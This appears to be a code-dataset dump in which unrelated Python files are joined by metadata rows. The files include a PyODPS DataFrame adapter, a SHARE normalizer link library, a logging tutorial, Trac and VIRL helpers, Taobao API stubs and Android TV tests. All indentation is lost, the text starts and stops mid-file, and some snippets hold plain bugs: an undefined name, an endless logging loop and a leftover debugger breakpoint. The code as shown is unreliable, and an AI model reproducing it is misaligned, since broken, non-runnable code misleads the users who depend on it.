if len(self.args) != 2 or len(self.inputs) != 1:
return False, None
if not isinstance(self.bind_df._source_data, DFIntermediateTable) or \
not self.bind_df._source_data.intermediate:
return False, None
ep = self.inputs['input1'].obj
if ep is not None:
# direct df output
if self.func.__name__ == 'persist' and self.bind_df == ep.df:
tables = []
for pep in ep._get_adapter_chain():
pep.table = self.args[1]
tables.append(pep.table)
return True, ObjectDescription(tables=tables, node_id=id(ep._bind_node))
return False, None
def adapter_from_df(df, odps=None, skip_orphan=False):
if df in _df_endpoint_dict:
return _df_endpoint_dict[df]
else:
closest_links = list(df.to_dag(False).closest_ancestors(df, lambda d: d in _df_endpoint_dict))
DFAdapter._add_df_link(df, *closest_links)
input_eps = [_df_endpoint_dict.get(f) for f in closest_links]
if skip_orphan and not input_eps:
return None
node = DFNode(len(input_eps))
for idx, inp_ep in enumerate(input_eps):
inp_ep._link_node(node, 'input%d' % (idx + 1))
odps = None
for source in df.data_source():
if hasattr(source, 'odps'):
odps = source.odps
break
if odps is None:
from ...inter import enter, InteractiveError
from ... import ODPS
if options.account is not None and options.default_project is not None:
odps = ODPS._from_account(
options.account, options.default_project,
endpoint=options.end_point, tunnel_endpoint=options.tunnel_endpoint
)
else:
try:
odps = enter().odps
except (InteractiveError, AttributeError):
import warnings
warnings.warn('No ODPS object available in rooms. Use odps.to_global() to make your ODPS object global.',
RuntimeWarning)
return DFAdapter(odps, node.outputs['output'], df, uplink=input_eps)
def convert_df_args(arg):
if arg is None:
return None
if isinstance(arg, (CollectionExpr, SequenceExpr)):
return adapter_from_df(arg)
if isinstance(arg, dict):
return dict((k, convert_df_args(v)) for k, v in six.iteritems(arg))
elif isinstance(arg, list):
return [convert_df_args(v) for v in arg]
elif isinstance(arg, tuple):
return tuple(convert_df_args(v) for v in arg)
elif isinstance(arg, set):
return set(convert_df_args(v) for v in arg)
else:
return arg
def extract_df_inputs(o):
if isinstance(o, (CollectionExpr, SequenceExpr, Scalar)):
yield o
elif isinstance(o, dict):
for v in itertools.chain(*(extract_df_inputs(dv) for dv in six.itervalues(o))):
if v is not None:
yield v
elif isinstance(o, (list, set, tuple)):
for v in itertools.chain(*(extract_df_inputs(dv) for dv in o)):
if v is not None:
yield v
else:
yield None
class PartitionSelection(object):
def __init__(self, part_def):
if isinstance(part_def, six.string_types):
self.parts = [[self._parse_sub_part(part) for part in one_part.split('/')] for one_part in part_def.split(',')]
else:
def parse_single_part(part_repr):
if isinstance(part_repr, six.string_types):
for sub_part in part_repr.split('/'):
yield self._parse_sub_part(sub_part)
else:
for sub_part in part_repr:
if isinstance(sub_part, six.string_types):
yield self._parse_sub_part(sub_part)
else:
yield sub_part
self.parts = [list(parse_single_part(part_repr)) for part_repr in part_def]
@staticmethod
def _parse_sub_part(p):
parts = p.strip().split('=', 1)
if parts[1].startswith('\'') or parts[1].startswith('\"'):
parts[1] = parts[1].strip('"\'').decode('string-escape')
else:
parts[1] = int(parts[1])
return parts
@staticmethod
def _repr_sub_part(p):
parts = copy.deepcopy(p)
if isinstance(parts[1], six.string_types):
parts[1] = '\"{0}\"'.format(str(parts[1]))
else:
parts[1] = str(parts[1])
return '='.join(parts)
def __iter__(self):
return iter(self.parts)
def __getitem__(self, item):
return self.parts[item]
def __repr__(self):
return ','.join('/'.join(self._repr_sub_part(part) for part in one_part) for one_part in self.parts)
def to_sql_condition(self):
return '(' + ') or ('.join(' and '.join(self._repr_sub_part(part) for part in one_part) for one_part in self.parts) + ')'
def to_partition_fields(self):
return list(reduce(lambda a, b: a + b, map(lambda a: [a[0], ], self.parts), []))
def to_partition_spec(self, pid):
return ','.join('='.join(a) for a in self.parts[pid])
class DFAdapter(RunnerObject):
def __init__(self, odps, port, df, **kw):
super(DFAdapter, self).__init__(odps, port)
self._df_ref = weakref.ref(df) if df is not None else None
self._uplink = kw.pop('uplink', [])
self._operations = []
self._table = None
self._partitions = None
self._custom_reload_functions = []
if df is not None:
_df_endpoint_dict[df] = self
from ..context import RunnerContext
RunnerContext.instance()._obj_container.register(self)
if port.obj_uuid is None:
port.obj_uuid = self._obj_uuid
if hasattr(self, 'init_df'):
self.init_df(self.df, **kw)
@staticmethod
def _add_df_link(df, *depends):
if not depends:
return
if df not in _df_link_maintainer:
_df_link_maintainer[df] = set()
_df_link_maintainer[df] |= set(depends)
@staticmethod
def _build_mock_table(table_name, schema, odps=None):
client = odps.rest if odps else None
return DFIntermediateTable(name=table_name, schema=schema, client=client)
def gen_temp_names(self):
if not self.table:
self.table = gen_table_name(self._bind_node.code_name, node_id=self._bind_node.node_id,
seq=self._bind_port.seq)
return ObjectDescription(tables=[self.table, ])
else:
return None
def _get_adapter_chain(self):
if len(self._uplink) == 1:
upds = self._uplink[0]
if (upds._bind_node, upds._bind_port) == (self._bind_node, self._bind_port):
chain = upds._get_adapter_chain() + [self, ]
else:
chain = [self, ]
else:
chain = [self, ]
return chain
def describe(self):
if self._partitions is None:
table_desc = self.table
else:
table_desc = (self.table, self.partitions)
return ObjectDescription(tables=table_desc, fields=self._fields)
def fill(self, desc):
if desc.tables:
if isinstance(desc.tables[0], tuple):
self.table, self.partitions = desc.tables[0]
else:
self.table, self.partitions = desc.tables[0], None
if desc.fields:
self._fields = desc.fields
self.df_from_fields(force_create=True)
@property
def table(self):
if self._table is not None:
return self._table
elif len(self._uplink) == 1:
upds = self._uplink[0]
if (upds._bind_node, upds._bind_port) == (self._bind_node, self._bind_port):
return upds.table
else:
return None
else:
return None
@table.setter
def table(self, value):
self._table = value
@property
def partitions(self):
if self._partitions is not None:
return self._partitions
elif len(self._uplink) == 1:
upds = self._uplink[0]
if (upds._bind_node, upds._bind_port) == (self._bind_node, self._bind_port):
return upds.partitions
else:
return None
else:
return None
@partitions.setter
def partitions(self, value):
if value:
self._partitions = value if isinstance(value, PartitionSelection) else PartitionSelection(value)
else:
self._partitions = None
@property
def df(self):
df_obj = self._df_ref() if self._df_ref is not None else None
return to_df_collection(df_obj) if df_obj is not None else None
@df.setter
def df(self, value):
if value is None or self._df_ref is None or id(value) != id(self._df_ref()):
if self._df_ref is not None and self._df_ref() in _df_endpoint_dict:
del _df_endpoint_dict[self._df_ref()]
if value is None:
self._df_ref = None
else:
self._add_df_link(value, *(adapter.df for adapter in self._uplink if adapter.df is not None))
_df_endpoint_dict[value] = self
self._df_ref = weakref.ref(value)
if hasattr(self, 'update_df'):
self.update_df(value)
@property
def fields(self):
if self.df is not None:
fields = set(c.name for c in self.df.schema.columns)
return [f for f in self._fields if f.name in fields]
return self._fields
def reload(self):
if isinstance(self.df, DataFrame) and all(hasattr(source, 'odps') for source in self.df.data_source()):
if '.' in self.table:
proj, table = self.table.split('.', 1)
else:
proj, table = None, self.table
new_df = DataFrame(self._odps.get_table(table, project=proj))
table_obj = self.df._source_data
if isinstance(table_obj, DFIntermediateTable):
new_table_obj = new_df._source_data
for s in Table.__slots__:
setattr(table_obj, s, getattr(new_table_obj, s))
table_obj.intermediate = False
self.df._schema = new_df._schema
if isinstance(self.df, DynamicMixin):
self.df._schema = new_df._schema
self.df.__class__ = DataFrame
for func in self._custom_reload_functions:
func()
def _link_incoming_dfs(self):
if self.df is None:
return
for p in six.itervalues(self._bind_node.inputs):
obj = p.obj
if obj is not None and isinstance(obj, DFAdapter):
self._add_df_link(self.df, obj.df)
def _duplicate_df_adapter(self, port, df=None):
if df is None:
df = self.df.copy()
elif self.df is not None:
self._add_df_link(df, self.df)
ep = DFAdapter(self._odps, port, df=df)
ep._link_incoming_dfs()
for p in six.itervalues(ep._bind_node.inputs):
obj = p.obj
if obj is not None and isinstance(obj, DFAdapter):
self._add_df_link(df, obj.df)
for attr, value in six.iteritems(vars(self)):
if not hasattr(ep, attr):
setattr(ep, attr, value)
ep._uplink.append(self)
return ep
def _iter_linked_objs(self):
yield self
if self.df is not None:
yield self.df
def perform_operation(self, op):
if self._uplink:
op.execute(self._uplink, self)
self._operations.append(op)
def df_run_hook(*args, **kwargs):
self = args[0]
func = kwargs.pop('_df_call')
if threading.current_thread().name.startswith('PyODPS'):
return func(*args, **kwargs)
def _fetch_upspring(df):
df_iter = df.to_dag(False).closest_ancestors(df, lambda d: d in _df_endpoint_dict)
if df in _df_endpoint_dict:
df_iter = itertools.chain(df_iter, (df, ))
return df_iter
dfs = itertools.chain(*(_fetch_upspring(f) for f in itertools.chain(extract_df_inputs(args), extract_df_inputs(kwargs)) if f is not None))
input_eps = [_df_endpoint_dict.get(f) for f in dfs]
if not input_eps:
return func(*args, **kwargs)
node = DFExecNode(self, len(input_eps), func, hashable(args), hashable(kwargs))
for idx, input_ep in enumerate(input_eps):
input_ep._link_node(node, 'input%d' % (1 + idx))
from ..context import RunnerContext
RunnerContext.instance()._run(node)
return node.sink
def install_hook():
from ...df.expr.expressions import register_exec_hook as register_df_exec_hook
register_df_exec_hook(df_run_hook)
install_hook()
| [
"[email protected]"
] | |
891b10c729cc41d184af202fe27ee44fb33c93fb | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/otherforms/_hungers.py | 83a72b5e0211718be8c579621609825ad0454cb4 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 222 | py |
#calss header
class _HUNGERS():
def __init__(self,):
self.name = "HUNGERS"
self.definitions = hunger
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['hunger']
| [
"[email protected]"
] | |
88482394f3d8b2feadd61f7632ec800377781b29 | 068d271e241d8cdb46dbf4243166e4b8ee7025b2 | /day08/day8/16.logging模块.py | 4c9f15064ad8ca6221e2e72af4b717640d5d9fb1 | [] | no_license | caiqinxiong/python | f6e226e76cb62aac970bcfbcb6c8adfc64858b60 | 9029f6c528d2cb742b600af224e803baa74cbe6a | refs/heads/master | 2023-05-26T19:41:34.911885 | 2020-05-15T09:02:08 | 2020-05-15T09:02:08 | 195,261,757 | 1 | 0 | null | 2021-06-10T23:33:33 | 2019-07-04T15:01:42 | JavaScript | UTF-8 | Python | false | false | 1,266 | py | # import logging
# fh = logging.FileHandler(filename='xxx.log',encoding='utf-8')
# fh1 = logging.FileHandler(filename='xxx2.log',encoding='utf-8')
# sh = logging.StreamHandler()
# logging.basicConfig(level=logging.INFO,
# handlers=[fh,sh,fh1],
# datefmt='%Y-%m-%d %H:%M:%S',
# format='%(asctime)s - %(name)s[%(lineno)d] - %(levelname)s -%(module)s: %(message)s')
# logging.debug('debug message') # 情况越轻
# logging.info('info message') # 信息类的日志
# logging.warning('warning message')
# logging.error('error message')
# logging.critical('critical message')
# logging日志分为5个等级
# 默认只显示warning等级以上的信息
import logging
from logging import handlers
sh = logging.StreamHandler()
rh = handlers.RotatingFileHandler('myapp.log', maxBytes=1024,backupCount=5)
fh = handlers.TimedRotatingFileHandler(filename='myapp2.log', when='s', interval=5, encoding='utf-8')
logging.basicConfig(level=logging.INFO,
handlers=[rh,fh,sh],
datefmt='%Y-%m-%d %H:%M:%S',
format='%(asctime)s - %(name)s[%(lineno)d] - %(levelname)s -%(module)s: %(message)s')
while True:
logging.WARNING('')
| [
"[email protected]"
] | |
87505b47481663ffa086e48bd4b226ccd4d8700d | c4fa1ebcdd413c4ab3f0979ee3beead8a8809870 | /share/normalize/links.py | 88254c3295a936526c92a7278fe4d6a87efdcd76 | [] | no_license | terroni/SHARE | e47f291db7cf100d29a7904fe820e75d29db1472 | a5631f441da1288722c68785b86128c854cbe7c1 | refs/heads/develop | 2020-12-03T02:29:47.381341 | 2016-07-11T19:40:27 | 2016-07-11T19:40:27 | 63,097,148 | 1 | 0 | null | 2016-07-11T19:45:51 | 2016-07-11T19:45:50 | null | UTF-8 | Python | false | false | 10,985 | py | import threading
from functools import reduce
from collections import deque
import xmltodict
import arrow
from lxml import etree
from pycountry import languages
from nameparser import HumanName
__all__ = ('ParseDate', 'ParseName', 'ParseLanguage', 'Trim', 'Concat', 'Map', 'Delegate', 'Maybe', 'XPath', 'Join', 'RunPython', 'Static')
#### Public API ####
def ParseDate(chain):
return chain + DateParserLink()
def ParseName(chain):
return chain + NameParserLink()
def ParseLanguage(chain):
return chain + LanguageParserLink()
def Trim(chain):
return chain + TrimLink()
def Concat(*chains):
return AnchorLink() + ConcatLink(*chains)
def XPath(chain, path):
return chain + XPathLink(path)
def Join(chain, joiner='\n'):
return AbstractLink.__add__(chain, JoinLink(joiner=joiner))
def Maybe(chain, segment, default=None):
return chain + MaybeLink(segment, default=default)
def Map(chain, *chains):
return Concat(*chains) + IteratorLink() + chain
def Delegate(parser, chain=None):
if chain:
return chain + DelegateLink(parser)
return DelegateLink(parser)
def RunPython(function_name, chain=None, *args, **kwargs):
if chain:
return chain + RunPythonLink(function_name, *args, **kwargs)
return RunPythonLink(function_name, *args, **kwargs)
def Static(value):
return StaticLink(value)
### /Public API
# A wrapper around dicts that can have dicts as keys
class DictHashingDict:
def __init__(self):
self.__inner = {}
def get(self, key, *args):
return self.__inner.get(self._hash(key), *args)
def __getitem__(self, key):
return self.__inner[self._hash(key)]
def __setitem__(self, key, value):
self.__inner[self._hash(key)] = value
def __contains__(self, key):
return self._hash(key) in self.__inner
def _hash(self, val):
if isinstance(val, dict):
val = tuple((k, self._hash(v)) for k, v in val.items())
if isinstance(val, (list, tuple)):
val = tuple(self._hash(v) for v in val)
return val
# BaseClass for all links
# Links are a single step of the parsing process
# Links may not mutate the object passed into them
# A chain is any number of links added together
class AbstractLink:
def __init__(self, _next=None, _prev=None):
# next and prev are generally set by the __add__ method
self._next = _next
self._prev = _prev
# Build the entire chain this link is a part of
# NOTE: This results in the entire chain rather than starting from the current link
def chain(self):
first = self
while first._prev:
first = first._prev
deq = deque([first])
while deq[-1]._next:
deq.append(deq[-1]._next)
return tuple(deq)
# Transformation logic goes here
def execute(self, obj):
raise NotImplemented
# Add a link into an existing chain
def __add__(self, step):
self._next = step
step._prev = self
return step
def __radd__(self, other):
return self + PrependLink(other)
# For handling paths that are not valid python
# or are already used. IE text, execute, oai:title
# ctx('oai:title')
def __getitem__(self, name):
if isinstance(name, int):
return self + IndexLink(name)
if isinstance(name, str):
return self + PathLink(name)
raise Exception(
'__getitem__ only accepts integers and strings\n'
'Found {}'.format(name)
)
# raise Exception
# Reserved for special cases
# Any other use is an error
def __call__(self, name):
if name == '*':
return self + IteratorLink()
if name == 'parent':
return self + ParentLink()
if name == 'index':
return self + GetIndexLink()
raise Exception(
'"{}" is not a action that __call__ can resolve\n'
'__call__ is reserved for special actions\n'
'If you are trying to access an element use dictionary notation'.format(name)
)
# The preferred way of building paths.
# Can express either json paths or xpaths
# ctx.root.nextelement[0].first_item_attribute
def __getattr__(self, name):
if name[0] == '_':
raise Exception(
'{} has no attribute {}\n'
'NOTE: "_"s are reserved for accessing private attributes\n'
'Use dictionary notation to access elements beginning with "_"s\n'.format(self, name)
)
return self + PathLink(name)
def __repr__(self):
return '<{}()>'.format(self.__class__.__name__)
def run(self, obj):
Context().frames.append({'link': self, 'context': obj})
ret = self.execute(obj)
Context().frames.pop(-1)
return ret
# The begining link for all chains
# Contains logic for executing a chain against an object
# Adding another link to an anchor will result in a copy of the
# original anchor
class AnchorLink(AbstractLink):
def execute(self, obj):
return reduce(lambda acc, cur: cur.run(acc), self.chain()[1:], obj)
class Context(AnchorLink):
__CONTEXT = threading.local()
@property
def jsonld(self):
return {
'@graph': self.graph,
'@context': {}
}
def __init__(self):
super().__init__()
if hasattr(Context.__CONTEXT, '_ctxdict'):
self.__dict__ = Context.__CONTEXT._ctxdict
return
Context.__CONTEXT._ctxdict = self.__dict__
self.clear()
def clear(self):
self.graph = []
self.frames = []
self.parser = None
self._config = None
self.pool = DictHashingDict()
def __add__(self, step):
return AnchorLink() + step
class NameParserLink(AbstractLink):
def execute(self, obj):
return HumanName(obj)
class DateParserLink(AbstractLink):
def execute(self, obj):
return arrow.get(obj).to('UTC').isoformat()
class LanguageParserLink(AbstractLink):
def execute(self, maybe_code):
# Force indices to populate
if not languages._is_loaded:
languages._load()
for kwarg in languages.indices.keys():
try:
return languages.get(**{kwarg: maybe_code}).iso639_3_code
except KeyError:
continue
return None
class ConcatLink(AbstractLink):
def __init__(self, *chains):
self._chains = chains
super().__init__()
def _concat(self, acc, val):
if val is None:
return acc
if not isinstance(val, list):
val = [val]
return acc + [v for v in val if v is not None]
def execute(self, obj):
return reduce(self._concat, [
chain.chain()[0].execute(obj)
for chain in self._chains
], [])
class JoinLink(AbstractLink):
def __init__(self, joiner='\n'):
self._joiner = joiner
super().__init__()
def execute(self, obj):
obj = obj or []
if not isinstance(obj, (list, tuple)):
obj = (obj, )
return self._joiner.join(x for x in obj if x)
class TrimLink(AbstractLink):
def execute(self, obj):
return obj.strip()
class ParentLink(AbstractLink):
def execute(self, obj):
return Context().parent
class IteratorLink(AbstractLink):
def __init__(self):
super().__init__()
self.__anchor = AnchorLink()
def __add__(self, step):
# Attach all new links to the "subchain"
self.__anchor.chain()[-1] + step
return self
def execute(self, obj):
if not isinstance(obj, (list, tuple)):
obj = (obj, )
if None in obj:
import ipdb; ipdb.set_trace()
return [self.__anchor.execute(sub) for sub in obj]
class MaybeLink(AbstractLink):
def __init__(self, segment, default=None):
super().__init__()
self._segment = segment
self._default = default
self.__anchor = AnchorLink()
def __add__(self, step):
# Attach all new links to the "subchain"
self.__anchor.chain()[-1] + step
return self
def execute(self, obj):
if not obj:
return []
val = obj.get(self._segment)
if val:
return self.__anchor.execute(val)
if len(Context().frames) > 1 and isinstance(Context().frames[-2]['link'], (IndexLink, IteratorLink, ConcatLink, JoinLink)):
return []
return self._default
class PathLink(AbstractLink):
def __init__(self, segment):
self._segment = segment
super().__init__()
def execute(self, obj):
return obj[self._segment]
def __repr__(self):
return '<{}({!r})>'.format(self.__class__.__name__, self._segment)
class IndexLink(AbstractLink):
def __init__(self, index):
self._index = index
super().__init__()
def execute(self, obj):
return obj[self._index]
def __repr__(self):
return '<{}([{}])>'.format(self.__class__.__name__, self._index)
class GetIndexLink(AbstractLink):
def execute(self, obj):
for frame in Context().frames[::-1]:
if isinstance(frame['link'], IteratorLink):
return frame['context'].index(obj)
return -1
# return Context().parent.index(obj)
class TextLink(AbstractLink):
def execute(self, obj):
return obj.text
class PrependLink(AbstractLink):
def __init__(self, string):
self._string = string
super().__init__()
def execute(self, obj):
return self._string + obj
class XPathLink(AbstractLink):
def __init__(self, xpath):
self._xpath = xpath
super().__init__()
def execute(self, obj):
unparsed_obj = xmltodict.unparse(obj)
xml_obj = etree.XML(unparsed_obj.encode())
elem = xml_obj.xpath(self._xpath)
elems = [xmltodict.parse(etree.tostring(x)) for x in elem]
if len(elems) == 1 and not isinstance(self._next, (IndexLink, IteratorLink)):
return elems[0]
return elems
class DelegateLink(AbstractLink):
def __init__(self, parser):
self._parser = parser
super().__init__()
def execute(self, obj):
return self._parser(obj).parse()
class RunPythonLink(AbstractLink):
def __init__(self, function_name, *args, **kwargs):
self._function_name = function_name
self._args = args
self._kwargs = kwargs
super().__init__()
def execute(self, obj):
return getattr(Context().parser, self._function_name)(obj, *self._args, **self._kwargs)
class StaticLink(AbstractLink):
def __init__(self, value):
self._value = value
super().__init__()
def execute(self, obj):
return self._value
| [
"[email protected]"
] | |
c3e48a7b3486a9f541e42d8e360ef80d57c5f287 | 91d1a6968b90d9d461e9a2ece12b465486e3ccc2 | /pinpoint_write_f/recommender-configuration_create.py | bf2bef53865f2a8a45fe748c41e6cf0bbc15a86e | [] | no_license | lxtxl/aws_cli | c31fc994c9a4296d6bac851e680d5adbf7e93481 | aaf35df1b7509abf5601d3f09ff1fece482facda | refs/heads/master | 2023-02-06T09:00:33.088379 | 2020-12-27T13:38:45 | 2020-12-27T13:38:45 | 318,686,394 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 997 | py | #!/usr/bin/python
# -*- codding: utf-8 -*-
import os
import sys
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
from common.execute_command import write_parameter
# url : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/describe-instances.html
if __name__ == '__main__':
"""
delete-recommender-configuration : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/pinpoint/delete-recommender-configuration.html
get-recommender-configuration : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/pinpoint/get-recommender-configuration.html
get-recommender-configurations : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/pinpoint/get-recommender-configurations.html
update-recommender-configuration : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/pinpoint/update-recommender-configuration.html
"""
write_parameter("pinpoint", "create-recommender-configuration") | [
"[email protected]"
] | |
a4ea05beb61a1ae9488673785bc21a36590eeb5d | 4569d707a4942d3451f3bbcfebaa8011cc5a128d | /hierwikiplugin/0.9/hierwiki/macros/parentwiki.py | aa746ceb1c51e30ceb2e29e717c30465cb294e13 | [] | no_license | woochica/trachacks | 28749b924c897747faa411876a3739edaed4cff4 | 4fcd4aeba81d734654f5d9ec524218b91d54a0e1 | refs/heads/master | 2021-05-30T02:27:50.209657 | 2013-05-24T17:31:23 | 2013-05-24T17:31:23 | 13,418,837 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,685 | py | # Macros for the HierWiki plugin
from trac.core import *
from trac.wiki.api import IWikiMacroProvider, WikiSystem
from StringIO import StringIO
import re, string, inspect
class ParentWikiMacro(Component):
"""
Inserts a link to the "parent" wiki entry.
This only applies to wikis that have a "/" in their name indicating heirarchy.
e.g. an entry named Java/Introduction will have a parent of Java. All other wiki entries have a parent of WikiStart.
"""
# TODO: Everything until render_macro can be removed once switched to be based on WikiMacroBase
implements(IWikiMacroProvider)
def get_macros(self):
"""Yield the name of the macro based on the class name."""
name = self.__class__.__name__
if name.endswith('Macro'):
name = name[:-5]
yield name
def get_macro_description(self, name):
"""Return the subclass's docstring."""
return inspect.getdoc(self.__class__)
def render_macro(self, req, name, args):
db = self.env.get_db_cnx()
cursor = db.cursor()
buf = StringIO()
prefix = None
if args:
prefix = args.replace('\'', '\'\'')
else:
prefix = req.hdf.getValue('wiki.page_name', '') + '/'
parent = 'WikiStart'
m = re.search("(\S+)/(\S+)$", prefix)
if m:
parent = m.group(1)
buf.write('<a href="%s">' % self.env.href.wiki(parent))
buf.write(parent)
buf.write('</a>\n')
return buf.getvalue()
| [
"coderanger@7322e99d-02ea-0310-aa39-e9a107903beb"
] | coderanger@7322e99d-02ea-0310-aa39-e9a107903beb |
d3b1d9bcf01a6956cb9f8162f90e476652811962 | 4b4828d3c98d76d7bf38f90a015945acc408ddc5 | /PythonAI/Source/W1D4/src/EX_REQ/ex_req_png.py | 13d7a84e8fda327fcf1724af0cd5c4b314c0726e | [] | no_license | Huh-jae-won/Study | cb5d32728e8dcded492e7edb054b500c91ec607c | e4dbc3fef69bb273b62b866fb5ef2a7250222f10 | refs/heads/main | 2023-06-20T13:06:26.691899 | 2021-07-11T07:43:41 | 2021-07-11T07:43:41 | 362,759,927 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 510 | py | # 모듈 로딩 -------------------------------------------
import requests
# 데이터 변수 선언 -------------------------------------
URL = 'http://wikibook.co.kr/logo.png'
IMG_FILE = '../../data/test.png'
# 데이터 가져오기 ------------------------------------
res = requests.get(URL)
if int(res.status_code) == 200:
# 바이너리 형식으로 데이터 저장
with open(IMG_FILE, "wb") as f:
f.write(res.content)
print("saved")
else:
print("ERROR : ", res.status_code) | [
"[email protected]"
] | |
8a8d04b9fceb712b14b32cf15babd104e5f7a9d6 | 61a5f4f9a862a5cb15ba5041bc0eebeb5a73d989 | /virtual/bin/pip3 | 92068ed905cf2a262dfed75c3731340c1c17f4a4 | [
"MIT"
] | permissive | iankabugi/chama | 8c48cb081e5202e6a1b446cd87fec6124fff7e6c | 282a460588c7f4476318314fe139e3b6ec574eb6 | refs/heads/master | 2020-05-02T11:59:01.129404 | 2019-03-27T11:50:20 | 2019-03-27T11:50:20 | 177,946,918 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 241 | #!/home/ian/Desktop/chama/virtual/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from pip._internal import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"[email protected]"
] | ||
b658f62dc2ae780047fb588ecb481e20ae1822d1 | 9b3f578e63a7e17e2b1bab5f38aa8625b8a80251 | /descarteslabs/client/services/tasks/tests/data/dl_test_package/package/module.py | 281e2167df79dcb724e1afd4151237c60c5b0182 | [
"Apache-2.0"
] | permissive | carderne/descarteslabs-python | e6f7000f08cd1569e0ddd0f7fb8e53abb6765183 | 757b480efb8d58474a3bf07f1dbd90652b46ed64 | refs/heads/master | 2022-12-09T23:19:02.361226 | 2020-08-13T11:52:30 | 2020-08-13T11:52:30 | 287,264,851 | 0 | 0 | NOASSERTION | 2020-08-13T11:46:58 | 2020-08-13T11:46:57 | null | UTF-8 | Python | false | false | 296 | py | a_global = "A global var"
def foo():
print("foo")
def func_foo():
a_local = "A local var"
return a_local + a_global
class outer_class:
class inner_class:
@staticmethod
def func_bar():
a_local = "A local var"
return a_local + a_global
| [
"[email protected]"
] | |
7c50534c50b9a795e870dc44b83879518e77b022 | f8f40422b6da71206bd45cb395761b2b56150b73 | /virl/cli/logs/commands.py | 96d8b20b45417e3518261d827d1d3b814dbf1f88 | [
"MIT"
] | permissive | RunSi/virlutils | 3bb96d8a805ad884578c967c480dc51f98a4cbab | 595bae19ea23ba589e7883bedd2076c40bfc4907 | refs/heads/master | 2021-01-25T13:36:53.273146 | 2017-12-15T20:06:42 | 2017-12-15T20:06:42 | 123,597,468 | 0 | 0 | MIT | 2018-03-02T15:42:22 | 2018-03-02T15:42:22 | null | UTF-8 | Python | false | false | 558 | py | import click
from virl.api import VIRLServer
from virl.cli.views import log_table
from virl import helpers
@click.command()
@click.argument('env', default='default')
def logs(env, **kwargs):
"""
Retrieves log information for the provided simulation
"""
running = helpers.check_sim_running(env)
if running:
sim_name = running
server = VIRLServer()
resp = server.get_logs(sim_name)
log_table(resp.json()['events'])
else:
click.secho("could not find logs for for env: {}".format(env), fg='red')
| [
"[email protected]"
] | |
59bf04653400bc0082de29089c4bffcf7a9921fa | 528f910908885c3ded4ecc6380b9603c8dcacbd6 | /tbapi/top/api/rest/FenxiaoProductSkuUpdateRequest.py | c720f4a5fcd2ed51753fc1fa937f037da27ea87c | [] | no_license | Monica-ckd/data007 | 15fe9c4c898a51a58100138b6b064211199d2ed1 | 0e54ae57eb719b86ec14ce9f77b027882a3398a8 | refs/heads/master | 2023-03-16T05:26:14.257318 | 2016-05-25T06:57:05 | 2016-05-25T06:57:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 501 | py | '''
Created by auto_sdk on 2013-04-01 16:44:41
'''
from top.api.base import RestApi
class FenxiaoProductSkuUpdateRequest(RestApi):
def __init__(self,domain='gw.api.taobao.com',port=80):
RestApi.__init__(self,domain, port)
self.agent_cost_price = None
self.dealer_cost_price = None
self.product_id = None
self.properties = None
self.quantity = None
self.sku_number = None
self.standard_price = None
def getapiname(self):
return 'taobao.fenxiao.product.sku.update'
| [
"[email protected]"
] | |
e200015486e71bc146de42be55e36a0a0cb55b0c | 94a6a83c8bd3f9a951ee7d48973f35d0b5b6f99c | /testcases/dev/GlobalSettings_dev.py | dee52c16156534ae6bd5896371cc00e4e651c91d | [] | no_license | JerryLiu0821/apython | 19766bebd5365e53aa7ea46adc01132045e91f9c | d9804b1099c879da1f8dc130fb205ab191f65fb1 | refs/heads/master | 2020-05-17T05:09:15.319167 | 2015-08-17T10:50:09 | 2015-08-17T10:50:09 | 40,886,032 | 2 | 2 | null | null | null | null | UTF-8 | Python | false | false | 5,079 | py | # -*- coding: utf-8 -*-
'''
Created on Mar 27, 2013
@author: liujian
'''
import unittest
import re, time, commands
import sys
sys.path.append('../testcases')
import Stability
class TestGlobalSettings(unittest.TestCase):
def setUp(self):
try :
self.error = ''
self.setup = Stability.SetupDeviceConnections()
self.a = self.setup.initializeTestDevice()
self.stabdl = Stability.StabDL(self.a)
self.a.input.back(3)
except Exception, e :
self.a.log.debug("", "\n Set up")
def tearDown(self):
self.a.input.back(3)
def test3D(self):
"""打开关闭3D|在设置中打开关闭3D"""
try:
#self.launchLetv()
self.a.input.home()
time.sleep(3)
self.a.input.home()
time.sleep(3)
self.a.input.back()
time.sleep(2)
self.a.device.sh('input keyevent 176')
self.a.input.left(8)
self.a.input.right(2)
self.a.input.center()
w = self.a.ui.screen()
if 'mode_msg' not in str(w.ids()):
self.error = 'cannot open 3d mode in settings'
raise Exception
for i in range(3):
self.a.input.right()
self.a.input.center()
if not self.isOK():
raise Exception
self.a.input.left(3)
self.a.input.center()
except Exception, e :
self.a.log.debug("", "\n test3D")
self.fail("Error happened: %s %s" % ( self.error, e))
def testMiracast(self):
"""Miracast打开关闭|在设置中打开关闭Miracast"""
try:
self.a.device.sh('input keyevent 176')
self.a.input.left(8)
self.a.input.right(4)
time.sleep(2)
self.a.input.center()
w = self.a.ui.screen()
if 'miracast_switch' not in str(w.ids()):
self.error = 'cannot open miracast mode in settings'
raise Exception
self.a.input.down()
for i in range(6):
if '\u5173\u95ed' in str(w.texts()):
print 'open miracast'
else:
print 'close miracast'
self.a.input.center()
time.sleep(10)
if not self.isOK():
raise Exception
w = self.a.ui.screen()
self.a.input.back()
except Exception, e :
self.a.log.debug("", "\n test3D")
self.fail("Error happened: %s %s" % ( self.error, e))
def _testInstallApks(self):
